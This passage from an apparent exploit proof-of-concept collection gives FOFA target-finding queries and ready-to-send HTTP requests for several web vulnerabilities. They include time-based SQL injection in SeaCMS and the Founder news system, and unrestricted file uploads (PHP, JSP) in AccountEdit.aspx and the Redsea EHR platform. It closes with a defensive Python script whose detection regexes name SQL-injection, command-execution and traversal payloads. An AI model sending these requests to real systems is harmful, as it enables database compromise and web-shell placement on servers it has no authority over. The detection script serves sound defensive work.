Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The file is then served from /storage/uploads/tttt.php; because of unlink(__FILE__) it removes itself after the first request, so fetch it once and check for tttt in the response.

200. SeaCMS (海洋影视管理系统) dmku SQL injection (time-based, MySQL)
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

The id parameter of the danmaku (dmku) delete action is concatenated into the query; a vulnerable host answers about 5 seconds late.

201. 方正 (Founder) All-Media News Editing System binary.do SQL injection (time-based, T-SQL)
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName, FieldName and KeyName are spliced straight into the SQL, so TableName can carry a stacked statement; decoded it reads DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, and a vulnerable host answers about 5 seconds late.

202. 微擎 system AccountEdit.aspx arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
First fetch the page to obtain the current __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Then substitute those two values into the upload request (ASP.NET rejects a postback whose event validation does not match the page it served):
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at /_data/Uploads/1123.txt. The POC uploads a harmless .txt; the point is that the "upload image" handler keeps the original file name and extension unchecked.

203. 红海云 (Redsea) EHR PtFjk.mob file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Note the mismatch between the declared part type (image/jpeg) and the .jsp file name: a vulnerable host accepts the upload on the basis of the declared type and stores the JSP, which prints hello,eHR when requested.
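For defenders going through proxy or WAF captures, the script below is an added example, not part of the original post or of any vendor's software, that checks raw requests against the endpoints and payload shapes of entries 189 to 203 above. It normalises the request path before matching, because two of the listed POCs (the /js/../ dot segment in 191 and the ;.js path parameter in 197) depend on the path reaching the authentication filter in one form and the handler in another, so a log search for the literal handler path misses them. The sample captures and host names are constructed; the payload regexes are heuristics, and the semicolon-in-JSON rule in particular will need tuning against real traffic.

```python
"""Signature check for the request patterns in entries 189-203 (added example)."""
import posixpath
import re
import urllib.parse
from typing import List, Tuple

# Normalised path (no dot segments, no ';' parameters, no trailing slash) -> entry.
KNOWN_ENDPOINTS = {
    "/xds/deleteStudy.php": "189 deleteStudy SQLi",
    "/index.php/admin/Userinfo/poihuoqu": "190 poihuoqu file read",
    "/CDGServer3/NavigationAjax": "191 NavigationAjax SQLi",
    "/JoinfApp/EMail/UploadEmailAttr": "192 UploadEmailAttr upload",
    "/master/ajaxActions/setSystemTimeAction.php": "193 setSystemTimeAction RCE",
    "/servlet/uploadAttachmentServlet": "194 uploadAttachmentServlet upload",
    "/send_order.cgi": "195 send_order.cgi RCE",
    "/cas/userCtl/resetPasswordBySuper": "196 resetPasswordBySuper",
    "/entsoft/Quotegask_editAction.entweb": "197 Quotegask_editAction SQLi",
    "/cgi-bin/luci/admin/services/aliyundrive-webdav/query": "198 CVE-2024-29640",
    "/assetsmanager/upload": "199 Cockpit upload",
    "/js/player/dmplayer/dmku": "200 SeaCMS dmku SQLi",
    "/newsedit/newsplan/task/binary.do": "201 binary.do SQLi",
    "/User/AccountEdit.aspx": "202 AccountEdit upload",
    "/RedseaPlatform/PtFjk.mob": "203 PtFjk upload",
}

# (label, regex) applied to the URL-decoded query string and body. These are
# heuristics; the JSON-semicolon rule in particular needs tuning on real traffic.
PAYLOAD_RULES = [
    ("T-SQL time-based blind (WAITFOR DELAY)", re.compile(r"waitfor\s+delay", re.I)),
    ("MySQL time-based blind (sleep())", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("UNION-based SQL injection", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("file:// URL in parameter (local file read)", re.compile(r"file:///", re.I)),
    ("os.system in parameter (command execution)", re.compile(r"os\.system\s*\(")),
    ("backtick command substitution", re.compile(r"`[^`]+`")),
    ("';' inside a JSON string value (shell metacharacter)", re.compile(r'"\s*:\s*"[^"]*;[^"]*"')),
    ("multipart filename with dot-dot traversal", re.compile(r'filename="[^"]*\.\./', re.I)),
    ("multipart filename with server-side script extension",
     re.compile(r'filename="[^"]*\.(jsp|php|ashx|aspx)"', re.I)),
]


def parse_request(raw: str) -> Tuple[str, str, str, str]:
    """Split a raw HTTP request into (method, path, query, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target = head.split("\n", 1)[0].split(" ")[:2]
    path, _, query = target.partition("?")
    return method, path, query, body


def normalize_path(path: str) -> str:
    """Strip ';param' from every segment, then resolve '.', '..' and trailing slashes."""
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/".join(segments)) or "/"


def scan(raw: str) -> List[str]:
    """Return the findings for one raw request; an empty list means nothing matched."""
    _, path, query, body = parse_request(raw)
    norm = normalize_path(path)
    findings: List[str] = []
    if norm in KNOWN_ENDPOINTS:
        findings.append("endpoint: " + KNOWN_ENDPOINTS[norm])
    if norm != (path.rstrip("/") or "/"):
        findings.append(f"path normalised: {path} -> {norm} (dot segment or ';' parameter, possible filter bypass)")
    # unquote_plus also maps '+' to a space, which is right for form bodies and
    # harmless for the multipart indicators matched here.
    decoded = urllib.parse.unquote_plus(query) + "\n" + urllib.parse.unquote_plus(body)
    for label, rx in PAYLOAD_RULES:
        if rx.search(decoded):
            findings.append("payload: " + label)
    return findings


# Constructed sample captures modelled on entries 191 and 194 (not real traffic).
SAMPLE_191 = (
    "POST /CDGServer3/js/../NavigationAjax HTTP/1.1\r\nHost: your-ip\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId="
)
SAMPLE_194 = (
    "POST /servlet/uploadAttachmentServlet HTTP/1.1\r\nHost: your-ip\r\n"
    "Content-Type: multipart/form-data; boundary=----X\r\n\r\n"
    '------X\r\nContent-Disposition: form-data; name="uploadFile"; '
    'filename="../../../../../jboss/web/fe.war/hello.jsp"\r\n'
    'Content-Type: text/plain\r\n\r\n<% out.println("hello");%>\r\n------X--\r\n'
)
SAMPLE_BENIGN = "GET /CDGServer3/index.jsp?lang=zh HTTP/1.1\r\nHost: your-ip\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_191, SAMPLE_194, SAMPLE_BENIGN):
        print(sample.split("\r\n", 1)[0], "->", scan(sample) or ["clean"])
```

Matching on the normalised path and on the decoded query and body is what makes the endpoint list useful: an access log that stores the path as requested still shows /CDGServer3/js/../NavigationAjax, and a rule on the raw URL would never see the WAITFOR in entry 201's POST body.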